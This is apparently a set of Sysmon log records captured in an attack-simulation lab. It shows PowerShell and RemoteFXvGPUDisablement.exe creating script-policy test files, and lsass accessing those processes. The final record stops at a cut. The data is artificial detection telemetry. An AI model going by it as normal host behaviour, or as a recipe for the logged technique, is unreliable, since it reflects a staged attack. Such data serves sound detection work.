{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.563\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nSourceProcessId: 1224\r\nSourceThreadId: 2032\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.563","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","SourceProcessId":"1224","SourceThreadId":"2032","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.766\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-001034380100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_jbulgi2t.pgg.ps1\r\nCreationUtcTime: 2020-08-01 05:46:31.766","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.766","ProcessGuid":"{A837DB8D-01B5-5F25-0000-001034380100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_jbulgi2t.pgg.ps1","CreationUtcTime":"2020-08-01 05:46:31.766","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.766\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nProcessId: 2180\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_lxjyme5v.spp.ps1\r\nCreationUtcTime: 2020-08-01 05:46:31.766","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.766","ProcessGuid":"{A837DB8D-01B5-5F25-0000-00103D410100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_lxjyme5v.spp.ps1","CreationUtcTime":"2020-08-01 05:46:31.766","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:31.844\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-001049400100}\r\nProcessId: 2160\r\nImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_pqxys1ax.klw.ps1\r\nCreationUtcTime: 2020-08-01 05:46:31.844","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:31.844","ProcessGuid":"{A837DB8D-01B5-5F25-0000-001049400100}","Image":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_pqxys1ax.klw.ps1","CreationUtcTime":"2020-08-01 05:46:31.844","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.735\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.735","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00103D410100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.735\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nTargetProcessId: 2096\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.735","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","TargetProcessId":"2096","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.735\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-00103D410100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.735","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-00103D410100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.735\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nTargetProcessId: 2096\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.735","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","TargetProcessId":"2096","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":994,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001049400100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:32.844","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-001049400100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:32.844\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-001049400100}\r\nTargetProcessId: 2160\r\nTargetImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 